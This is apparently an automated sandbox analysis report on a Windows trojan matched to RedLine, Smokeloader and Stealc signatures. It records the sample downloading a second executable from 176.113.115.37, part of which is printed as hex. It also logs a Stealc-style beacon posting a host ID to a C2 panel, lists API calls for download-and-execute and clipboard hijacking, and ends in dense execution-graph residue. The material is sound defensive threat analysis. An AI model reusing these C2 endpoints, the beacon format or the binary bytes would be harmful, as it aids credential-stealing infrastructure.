Oct 26, 2024 19:08:20.481583118 CEST | 1.1.1.1 | 192.168.2.4 | 0x7c41 | No error (0) | post-to-me.com | (none) | 172.67.179.207 | A (IP address) | IN (0x0001) | false
                                                                                • post-to-me.com
                                                                                • 176.113.115.37
                                                                                • 62.204.41.177
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 176.113.115.37 | 80 | 6808 | C:\Users\user\Desktop\TP77MvSzt2.exe
Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 19:08:22.565295935 CEST | 85 | OUT | GET /ScreenUpdateSync.exe HTTP/1.1
                                                                                User-Agent: ShareScreen
                                                                                Host: 176.113.115.37
Oct 26, 2024 19:08:23.474637032 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 26 Oct 2024 17:08:23 GMT
                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                Last-Modified: Sat, 26 Oct 2024 17:00:01 GMT
                                                                                ETag: "62400-625642a987083"
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 402432
                                                                                Content-Type: application/x-msdos-program
                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4b fa 88 0b 0f 9b e6 58 0f 9b e6 58 0f 9b e6 58 b2 d4 70 58 0e 9b e6 58 11 c9 62 58 11 9b e6 58 11 c9 73 58 1b 9b e6 58 11 c9 65 58 64 9b e6 58 28 5d 9d 58 0a 9b e6 58 0f 9b e7 58 74 9b e6 58 11 c9 6c 58 0e 9b e6 58 11 c9 72 58 0e 9b e6 58 11 c9 77 58 0e 9b e6 58 52 69 63 68 0f 9b e6 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bd b3 2f 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a8 03 00 00 38 10 00 00 00 00 00 ea 16 00 00 00 10 00 00 00 c0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 26 00 00 04 00 00 5b 38 06 00 02 00 00 81 00 00 [TRUNCATED]
                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$KXXXpXXbXXsXXeXdX(]XXXtXlXXrXXwXXRichXPEL/f8@&[8<.text `.rdata%&@@.dataxL@.rsrc@@
Oct 26, 2024 19:08:23.474653959 CEST | 212 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 04 f0 43 00 75 02 f3 c3 e9 e5 06 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 5c 08 00 00 8b
                                                                                Data Ascii: ;CuUQeVEPuu\u9EttM^jh Ceu;5dQw"jYeVYEEEjYUVu
Oct 26, 2024 19:08:23.474667072 CEST | 1236 | IN | Data Raw: a1 00 00 00 53 57 8b 3d d4 c0 43 00 83 3d ec 0a 44 00 00 75 18 e8 59 1c 00 00 6a 1e e8 a7 1a 00 00 68 ff 00 00 00 e8 e9 17 00 00 59 59 a1 54 a9 51 00 83 f8 01 75 0e 85 f6 74 04 8b c6 eb 03 33 c0 40 50 eb 1c 83 f8 03 75 0b 56 e8 53 ff ff ff 59 85
                                                                                Data Ascii: SW=C=DuYjhYYTQut3@PuVSYuuFVj5Du.j^9@Dtu7Ytu{00_[VY3^]UjjuE]U]UQSVW5HQ5
Oct 26, 2024 19:08:23.474680901 CEST | 1236 | IN | Data Raw: 50 ff 15 e0 c0 43 00 6a fe 5f 89 7d fc b8 4d 5a 00 00 66 39 05 00 00 40 00 75 38 a1 3c 00 40 00 81 b8 00 00 40 00 50 45 00 00 75 27 b9 0b 01 00 00 66 39 88 18 00 40 00 75 19 83 b8 74 00 40 00 0e 76 10 33 c9 39 b0 e8 00 40 00 0f 95 c1 89 4d e4 eb
                                                                                Data Ascii: PCj_}MZf9@u8<@@PEu'f9@ut@v39@Mu3CS-YujXYujGY5](3}jWYCtQ1dD1}j1Y.}j YSY;tPY.]tMjYQ
Oct 26, 2024 19:08:23.474709034 CEST | 424 | IN | Data Raw: ff 15 f8 c0 43 00 5d c3 6a 0c 68 a8 d8 43 00 e8 b0 0b 00 00 33 ff 47 89 7d e4 33 db 39 1d ec 0a 44 00 75 18 e8 a2 12 00 00 6a 1e e8 f0 10 00 00 68 ff 00 00 00 e8 32 0e 00 00 59 59 8b 75 08 8d 34 f5 80 f1 43 00 39 1e 74 04 8b c7 eb 6e 6a 18 e8 dd
                                                                                Data Ascii: C]jhC3G}39Dujh2YYu4C9tnjY;u3QjYY]9u,hW 2YYuWt2YQ]>WY2YEEHj(YUEV4C>uP"Yuj&Y
Oct 26, 2024 19:08:23.474720001 CEST | 1236 | IN | Data Raw: eb 8d 4c 02 04 f7 d3 21 5c b8 44 fe 09 75 23 8b 4d 08 21 19 eb 1c 8d 4a e0 d3 eb 8d 4c 02 04 f7 d3 21 9c b8 c4 00 00 00 fe 09 75 06 8b 4d 08 21 59 04 8b 5d 0c 8b 53 08 8b 5b 04 8b 4d fc 03 4d f4 89 5a 04 8b 55 0c 8b 5a 04 8b 52 08 89 53 08 89 4d
                                                                                Data Ascii: L!\Du#M!JL!uM!Y]S[MMZUZRSMJ?vj?Z]]+u]j?uK^;vMJM;v;t^Mq;qu; s!tDLu!M!1K!LuM!qMqINMq
Oct 26, 2024 19:08:23.474730968 CEST | 1236 | IN | Data Raw: 00 00 00 80 83 f9 20 73 1a d3 eb 8b 4d f8 8d 4c 01 04 f7 d3 21 5c 90 44 fe 09 75 26 8b 4d 08 21 19 eb 1f 83 c1 e0 d3 eb 8b 4d f8 8d 4c 01 04 f7 d3 21 9c 90 c4 00 00 00 fe 09 75 06 8b 4d 08 21 59 04 8b 4f 08 8b 5f 04 89 59 04 8b 4f 04 8b 7f 08 89
                                                                                Data Ascii: sML!\Du&M!ML!uM!YO_YOyM+M}}MOL1?vj?_]][Y]YKYKY;YuWLML s}uMDD }uOMYO
Oct 26, 2024 19:08:23.474742889 CEST | 424 | IN | Data Raw: 00 80 d3 ef 09 7b 04 8b 4d fc 8d bc 88 c4 00 00 00 8d 4e e0 be 00 00 00 80 d3 ee 09 37 8b 4d f8 85 c9 74 0b 89 0a 89 4c 11 fc eb 03 8b 4d f8 8b 75 f0 03 d1 8d 4e 01 89 0a 89 4c 32 fc 8b 75 f4 8b 0e 8d 79 01 89 3e 85 c9 75 1a 3b 1d e8 0a 44 00 75
                                                                                Data Ascii: {MN7MtLMuNL2uy>u;DuM;pQu%DMB_^[h&@d5D$l$l$+SVWC1E3PeuEEEEdMdY__^[]QUS]Vs35CW
Oct 26, 2024 19:08:23.474761009 CEST | 1236 | IN | Data Raw: 8b 45 f4 5f 5e 5b 8b e5 5d c3 c7 45 f4 00 00 00 00 eb c9 8b 4d 08 81 39 63 73 6d e0 75 29 83 3d 58 a9 51 00 00 74 20 68 58 a9 51 00 e8 c3 2b 00 00 83 c4 04 85 c0 74 0f 8b 55 08 6a 01 52 ff 15 58 a9 51 00 83 c4 08 8b 4d 0c e8 df 2a 00 00 8b 45 0c
                                                                                Data Ascii: E_^[]EM9csmu)=XQt hXQ+tUjRXQM*E9XthCW*EMHtN381NV3:!EHu*9SRhCW*U39EjhPPCDu]3@TQ]U
Oct 26, 2024 19:08:23.474844933 CEST | 1236 | IN | Data Raw: 26 68 b8 c7 43 00 68 fb 02 00 00 56 e8 8a 2d 00 00 83 c4 0c 85 c0 74 0f 33 c0 50 50 50 50 50 e8 26 15 00 00 83 c4 14 56 e8 e3 2c 00 00 40 59 83 f8 3c 76 38 56 e8 d6 2c 00 00 83 ee 3b 03 c6 6a 03 b9 3c 0e 44 00 68 b4 c7 43 00 2b c8 51 50 e8 01 2c
                                                                                Data Ascii: &hChV-t3PPPPP&V,@Y<v8V,;j<DhC+QP,t3VVVVV3hCSWg+tVVVVVE4CSWB+tVVVVVh hCW)2j|C;t$tjEP4C6!,YP6
Oct 26, 2024 19:08:23.480191946 CEST | 1236 | IN | Data Raw: ff 35 48 0e 44 00 e8 65 ff ff ff 59 8b f0 56 ff 35 64 f3 43 00 ff 15 28 c1 43 00 8b c6 5e c3 a1 60 f3 43 00 83 f8 ff 74 16 50 ff 35 50 0e 44 00 e8 3b ff ff ff 59 ff d0 83 0d 60 f3 43 00 ff a1 64 f3 43 00 83 f8 ff 74 0e 50 ff 15 2c c1 43 00 83 0d
                                                                                Data Ascii: 5HDeYV5dC(C^`CtP5PD;Y`CdCtP,CdCjhCCV8CuVYEuF\C3G~t$hCPChCu~pCKCFhhCjRYevhCE>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 62.204.41.177 | 80 | 5440 | C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 19:08:31.552400112 CEST | 88 | OUT | GET / HTTP/1.1
                                                                                Host: 62.204.41.177
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
Oct 26, 2024 19:08:32.470412970 CEST | 203 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 26 Oct 2024 17:08:32 GMT
                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                Content-Length: 0
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Connection: Keep-Alive
                                                                                Content-Type: text/html; charset=UTF-8
Oct 26, 2024 19:08:33.125067949 CEST | 419 | OUT | POST /edd20096ecef326d.php HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAEC
                                                                                Host: 62.204.41.177
                                                                                Content-Length: 219
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 33 42 46 33 36 42 32 31 34 38 32 36 30 34 39 38 32 31 36 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 2d 2d 0d 0a
                                                                                Data Ascii: ------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="hwid"3E3BF36B21482604982160------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="build"default9_cap------KKJKEBKFCAAECAAAAAEC--
Oct 26, 2024 19:08:34.605154991 CEST | 210 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 26 Oct 2024 17:08:33 GMT
                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                Content-Length: 8
                                                                                Keep-Alive: timeout=5, max=99
                                                                                Connection: Keep-Alive
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                Data Ascii: YmxvY2s=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 104.21.56.70 | 443 | 6808 | C:\Users\user\Desktop\TP77MvSzt2.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-26 17:08:21 UTC | 90 | OUT | GET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                User-Agent: ShareScreen
                                                                                Host: post-to-me.com
2024-10-26 17:08:22 UTC | 780 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 26 Oct 2024 17:08:22 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                X-Powered-By: PHP/5.4.16
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qvb9oaU7zXZG6AJDKkOofqv1Wrkc4CUA8wIDwFSlg1Lw0847vSO9VZ8VZhEuThUwhR0VoE1iONfq0qhYQT3O1RI%2B4PZ%2Fg%2Fcd%2Bf%2Fa7rwR0sRtEDZF33jb1kFv4yINQcgauw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d8c0c45bb4e6bae-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1070&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=728&delivery_rate=2637522&cwnd=251&unsent_bytes=0&cid=1f17074025418419&ts=1233&x=0"
2024-10-26 17:08:22 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                Data Ascii: 2ok
2024-10-26 17:08:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0



Target ID: 0
Start time: 13:08:16
Start date: 26/10/2024
Path: C:\Users\user\Desktop\TP77MvSzt2.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\TP77MvSzt2.exe"
Imagebase: 0x400000
File size: 466'944 bytes
MD5 hash: 1E1E32D1EEDB37A1E3C1AD488621B26F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4210942714.0000000002DA9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: false

Target ID: 1
Start time: 13:08:25
Start date: 26/10/2024
Path: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe"
Imagebase: 0x400000
File size: 402'432 bytes
MD5 hash: 8107C38AF897D81AA4BFE8CE9CA8407C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2966797377.00000000008D9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1890384473.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true

Target ID: 7
Start time: 13:08:34
Start date: 26/10/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 1076
Imagebase: 0xc20000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


                                                                                  Execution Graph

Execution Coverage: 2.2%
Dynamic/Decrypted Code Coverage: 3.8%
Signature Coverage: 5.8%
Total number of Nodes: 738
Total number of Limit Nodes: 21
[Execution graph: the interactive node/edge rendering is not reproduced. The graph lists functions by address (0x401000-0x435000 range) with the Windows APIs each one calls and the edges between them. APIs named in the graph nodes, grouped by behaviour:
- Download and execute: InternetOpenW, InternetOpenUrlW, InternetReadFile, GetTempPathW, GetTempFileNameW, CreateFileW, WriteFile, CloseHandle, ShellExecuteExW, WaitForSingleObject, InternetCloseHandle
- Clipboard monitoring loop: Sleep, OpenClipboard, GetClipboardData, GlobalLock, EmptyClipboard, GlobalAlloc, GlobalUnlock, SetClipboardData, GlobalFree, CloseClipboard
- Threading and error handling: CreateThread, GetCurrentThreadId, ExitThread, GetLastError, SetLastError, RaiseException, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent
- Memory, modules and misc: RtlAllocateHeap, HeapAlloc, HeapFree, GetModuleHandleExW, FreeLibrary, WideCharToMultiByte, GetSystemTimeAsFileTime]
63988->63992 63989 403c9f 63989->63990 63991 4046ef 167 API calls 63989->63991 63990->63921 63991->63990 63992->63989 63994 403cf3 __EH_prolog3_catch 63993->63994 63995 4042d4 167 API calls 63994->63995 63997 403d0c 63995->63997 63996 4046ef 167 API calls 63999 403d95 Concurrency::details::ResourceManager::SubscribeCurrentThread 63996->63999 63998 403d3c 63997->63998 64000 4036c4 40 API calls 63997->64000 63998->63996 63999->63924 64000->63998 64001->63923 64002->63923 64003->63930 64004->63867 64006 40cc51 _strlen 64005->64006 64012 40cbec 64006->64012 64008 401708 64008->63870 64009->63880 64010->63885 64011->63880 64013 40cbfb BuildCatchObjectHelperInternal 64012->64013 64014 40cc1f 64012->64014 64013->64008 64016 40cb81 28 API calls 4 library calls 64014->64016 64016->64013 64025 40f24f EnterCriticalSection 64017->64025 64019 40df19 64020 40cebe GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 64019->64020 64021 40cef7 64020->64021 64022 40ceec CloseHandle 64020->64022 64023 40cefb GetCurrentThreadId 64021->64023 64022->64023 64023->63892 64024->63891 64025->64019 64035 431f7e GetLastError 64026->64035 64028 42e0a3 ExitThread 64029 42e0c1 64032 42e0d4 64029->64032 64033 42e0cd CloseHandle 64029->64033 64032->64028 64034 42e0e0 FreeLibraryAndExitThread 64032->64034 64033->64032 64036 431f9d 64035->64036 64037 431f97 64035->64037 64038 434d4a __Thrd_start 17 API calls 64036->64038 64042 431ff4 SetLastError 64036->64042 64055 435131 11 API calls 2 library calls 64037->64055 64040 431faf 64038->64040 64041 431fb7 64040->64041 64056 435187 11 API calls 2 library calls 64040->64056 64045 43348a _free 17 API calls 64041->64045 64043 42e09f 64042->64043 64043->64028 64043->64029 64054 435516 10 API calls 2 library calls 64043->64054 64047 431fbd 64045->64047 64046 431fcc 64046->64041 64048 431fd3 64046->64048 64049 431feb SetLastError 64047->64049 64057 431d6c 20 API calls _Atexit 64048->64057 64049->64043 64051 431fde 64052 43348a _free 17 API 
calls 64051->64052 64053 431fe4 64052->64053 64053->64042 64053->64049 64054->64029 64055->64036 64056->64046 64057->64051 64058->63692 64059 402c24 InternetOpenW 64060 402e7a 64059->64060 64063 402c57 Concurrency::details::ReferenceCountedQuickBitSet::Grow 64059->64063 64061 40f8f4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 64060->64061 64062 402e89 64061->64062 64071 42df1d 64063->64071 64066 42df1d std::_Locinfo::_Locinfo_ctor 26 API calls 64067 402e3c 64066->64067 64068 42df1d std::_Locinfo::_Locinfo_ctor 26 API calls 64067->64068 64069 402e4e InternetOpenUrlW 64068->64069 64069->64060 64070 402e69 InternetCloseHandle InternetCloseHandle 64069->64070 64070->64060 64072 42df2c 64071->64072 64074 42df3a 64071->64074 64072->64074 64078 42df6a 64072->64078 64080 42eae9 20 API calls _Atexit 64074->64080 64075 42df44 64081 42a5bd 26 API calls _Deallocate 64075->64081 64077 402e2e 64077->64066 64078->64077 64082 42eae9 20 API calls _Atexit 64078->64082 64080->64075 64081->64077 64082->64075 64083 4327a5 64088 432573 64083->64088 64086 4327cd 64093 43259e 64088->64093 64090 432791 64107 42a5bd 26 API calls _Deallocate 64090->64107 64092 4326f0 64092->64086 64100 43d03c 64092->64100 64096 4326e7 64093->64096 64103 43c8ee 170 API calls 2 library calls 64093->64103 64095 432731 64095->64096 64104 43c8ee 170 API calls 2 library calls 64095->64104 64096->64092 64106 42eae9 20 API calls _Atexit 64096->64106 64098 432750 64098->64096 64105 43c8ee 170 API calls 2 library calls 64098->64105 64108 43ca11 64100->64108 64102 43d057 64102->64086 64103->64095 64104->64098 64105->64096 64106->64090 64107->64092 64111 43ca1d CallCatchBlock 64108->64111 64109 43ca2b 64126 42eae9 20 API calls _Atexit 64109->64126 64111->64109 64113 43ca64 64111->64113 64112 43ca30 64127 42a5bd 26 API calls _Deallocate 64112->64127 64119 43cfeb 64113->64119 64118 43ca3a __fread_nolock 64118->64102 64129 43f961 64119->64129 64122 43ca88 64128 43cab1 LeaveCriticalSection __wsopen_s 
64122->64128 64125 43348a _free 20 API calls 64125->64122 64126->64112 64127->64118 64128->64118 64130 43f984 64129->64130 64131 43f96d 64129->64131 64132 43f9a3 64130->64132 64133 43f98c 64130->64133 64199 42eae9 20 API calls _Atexit 64131->64199 64203 434fca 10 API calls 2 library calls 64132->64203 64201 42eae9 20 API calls _Atexit 64133->64201 64137 43f972 64200 42a5bd 26 API calls _Deallocate 64137->64200 64138 43f991 64202 42a5bd 26 API calls _Deallocate 64138->64202 64139 43f9aa MultiByteToWideChar 64142 43f9d9 64139->64142 64143 43f9c9 GetLastError 64139->64143 64205 4336c7 21 API calls 3 library calls 64142->64205 64204 42eab3 20 API calls 3 library calls 64143->64204 64146 43d001 64146->64122 64153 43d05c 64146->64153 64147 43f9e1 64148 43fa09 64147->64148 64149 43f9e8 MultiByteToWideChar 64147->64149 64150 43348a _free 20 API calls 64148->64150 64149->64148 64151 43f9fd GetLastError 64149->64151 64150->64146 64206 42eab3 20 API calls 3 library calls 64151->64206 64154 43d079 64153->64154 64155 43d0a7 64154->64155 64156 43d08e 64154->64156 64207 43979e 64155->64207 64221 42ead6 20 API calls _Atexit 64156->64221 64159 43d0ac 64160 43d0b5 64159->64160 64161 43d0cc 64159->64161 64223 42ead6 20 API calls _Atexit 64160->64223 64220 43cd2a CreateFileW 64161->64220 64165 43d105 64167 43d182 GetFileType 64165->64167 64169 43d157 GetLastError 64165->64169 64225 43cd2a CreateFileW 64165->64225 64166 43d0ba 64224 42eae9 20 API calls _Atexit 64166->64224 64170 43d18d GetLastError 64167->64170 64171 43d1d4 64167->64171 64226 42eab3 20 API calls 3 library calls 64169->64226 64227 42eab3 20 API calls 3 library calls 64170->64227 64229 4396e7 21 API calls 3 library calls 64171->64229 64175 43d093 64222 42eae9 20 API calls _Atexit 64175->64222 64176 43d19b CloseHandle 64176->64175 64179 43d1c4 64176->64179 64178 43d14a 64178->64167 64178->64169 64228 42eae9 20 API calls _Atexit 64179->64228 64180 43d1f5 64182 43d241 64180->64182 64230 43cf3b 169 API calls 4 library calls 
64180->64230 64187 43d26e 64182->64187 64231 43cadd 167 API calls 4 library calls 64182->64231 64183 43d1c9 64183->64175 64186 43d267 64186->64187 64188 43d27f 64186->64188 64232 4335ed 29 API calls 2 library calls 64187->64232 64190 43d029 64188->64190 64191 43d2fd CloseHandle 64188->64191 64190->64125 64233 43cd2a CreateFileW 64191->64233 64193 43d328 64194 43d332 GetLastError 64193->64194 64195 43d277 64193->64195 64234 42eab3 20 API calls 3 library calls 64194->64234 64195->64190 64197 43d33e 64235 4398b0 21 API calls 3 library calls 64197->64235 64199->64137 64200->64146 64201->64138 64202->64146 64203->64139 64204->64146 64205->64147 64206->64148 64208 4397aa CallCatchBlock 64207->64208 64236 42e40d EnterCriticalSection 64208->64236 64211 4397d6 64240 43957d 21 API calls 3 library calls 64211->64240 64213 439821 __fread_nolock 64213->64159 64214 4397b1 64214->64211 64216 439844 EnterCriticalSection 64214->64216 64217 4397f8 64214->64217 64215 4397db 64215->64217 64241 4396c4 EnterCriticalSection 64215->64241 64216->64217 64218 439851 LeaveCriticalSection 64216->64218 64237 4398a7 64217->64237 64218->64214 64220->64165 64221->64175 64222->64190 64223->64166 64224->64175 64225->64178 64226->64175 64227->64176 64228->64183 64229->64180 64230->64182 64231->64186 64232->64195 64233->64193 64234->64197 64235->64195 64236->64214 64242 42e455 LeaveCriticalSection 64237->64242 64239 4398ae 64239->64213 64240->64215 64241->64217 64242->64239 64243 43412a 64244 434136 CallCatchBlock 64243->64244 64245 434142 64244->64245 64246 434159 64244->64246 64277 42eae9 20 API calls _Atexit 64245->64277 64256 42cb1f EnterCriticalSection 64246->64256 64249 434147 64278 42a5bd 26 API calls _Deallocate 64249->64278 64250 434169 64257 4341a6 64250->64257 64253 434175 64279 43419c LeaveCriticalSection __fread_nolock 64253->64279 64255 434152 __fread_nolock 64256->64250 64258 4341b4 64257->64258 64259 4341ce 64257->64259 64290 42eae9 20 API calls _Atexit 64258->64290 64280 432928 
64259->64280 64262 4341b9 64291 42a5bd 26 API calls _Deallocate 64262->64291 64264 4341d7 64287 4347f3 64264->64287 64267 4342db 64269 4342e8 64267->64269 64276 43428e 64267->64276 64268 43425f 64271 43427c 64268->64271 64268->64276 64293 42eae9 20 API calls _Atexit 64269->64293 64292 4344bf 31 API calls 4 library calls 64271->64292 64273 434286 64274 4341c4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 64273->64274 64274->64253 64276->64274 64294 43433b 30 API calls 2 library calls 64276->64294 64277->64249 64278->64255 64279->64255 64281 432934 64280->64281 64282 432949 64280->64282 64295 42eae9 20 API calls _Atexit 64281->64295 64282->64264 64284 432939 64296 42a5bd 26 API calls _Deallocate 64284->64296 64286 432944 64286->64264 64297 434670 64287->64297 64289 4341f3 64289->64267 64289->64268 64289->64274 64290->64262 64291->64274 64292->64273 64293->64274 64294->64274 64295->64284 64296->64286 64298 43467c CallCatchBlock 64297->64298 64299 434684 64298->64299 64302 43469c 64298->64302 64332 42ead6 20 API calls _Atexit 64299->64332 64301 434750 64337 42ead6 20 API calls _Atexit 64301->64337 64302->64301 64307 4346d4 64302->64307 64303 434689 64333 42eae9 20 API calls _Atexit 64303->64333 64306 434755 64338 42eae9 20 API calls _Atexit 64306->64338 64322 4396c4 EnterCriticalSection 64307->64322 64310 43475d 64339 42a5bd 26 API calls _Deallocate 64310->64339 64311 4346da 64313 434713 64311->64313 64314 4346fe 64311->64314 64323 434775 64313->64323 64334 42eae9 20 API calls _Atexit 64314->64334 64316 434691 __fread_nolock 64316->64289 64318 434703 64335 42ead6 20 API calls _Atexit 64318->64335 64319 43470e 64336 434748 LeaveCriticalSection __wsopen_s 64319->64336 64322->64311 64340 439941 64323->64340 64325 434787 64326 4347a0 SetFilePointerEx 64325->64326 64327 43478f 64325->64327 64329 434794 64326->64329 64330 4347b8 GetLastError 64326->64330 64353 42eae9 20 API calls _Atexit 64327->64353 64329->64319 64354 42eab3 20 API calls 3 library calls 64330->64354 
64332->64303 64333->64316 64334->64318 64335->64319 64336->64316 64337->64306 64338->64310 64339->64316 64341 439963 64340->64341 64342 43994e 64340->64342 64348 439988 64341->64348 64357 42ead6 20 API calls _Atexit 64341->64357 64355 42ead6 20 API calls _Atexit 64342->64355 64344 439953 64356 42eae9 20 API calls _Atexit 64344->64356 64346 439993 64358 42eae9 20 API calls _Atexit 64346->64358 64348->64325 64350 43995b 64350->64325 64351 43999b 64359 42a5bd 26 API calls _Deallocate 64351->64359 64353->64329 64354->64329 64355->64344 64356->64350 64357->64346 64358->64351 64359->64350 64360 4023ba 64361 402581 PostQuitMessage 64360->64361 64362 4023ce 64360->64362 64363 40257f 64361->64363 64364 4023d5 DefWindowProcW 64362->64364 64365 4023ec 64362->64365 64364->64363 64365->64363 64366 402a14 167 API calls 64365->64366 64366->64363 64367 40fc2b 64368 40fc37 CallCatchBlock 64367->64368 64396 410018 64368->64396 64370 40fc3e 64371 40fd91 64370->64371 64374 40fc68 64370->64374 64417 4104f3 4 API calls 2 library calls 64371->64417 64373 40fd98 64418 42ffe9 28 API calls _Atexit 64373->64418 64383 40fca7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 64374->64383 64411 42fd0e 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 64374->64411 64376 40fd9e 64419 42ff9b 28 API calls _Atexit 64376->64419 64379 40fc81 64381 40fc87 64379->64381 64412 42fcb2 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 64379->64412 64380 40fda6 64387 40fd08 64383->64387 64413 42a386 167 API calls 4 library calls 64383->64413 64386 40fd0e 64388 40fd23 64386->64388 64407 41060d 64387->64407 64414 410643 GetModuleHandleW 64388->64414 64390 40fd2a 64390->64373 64391 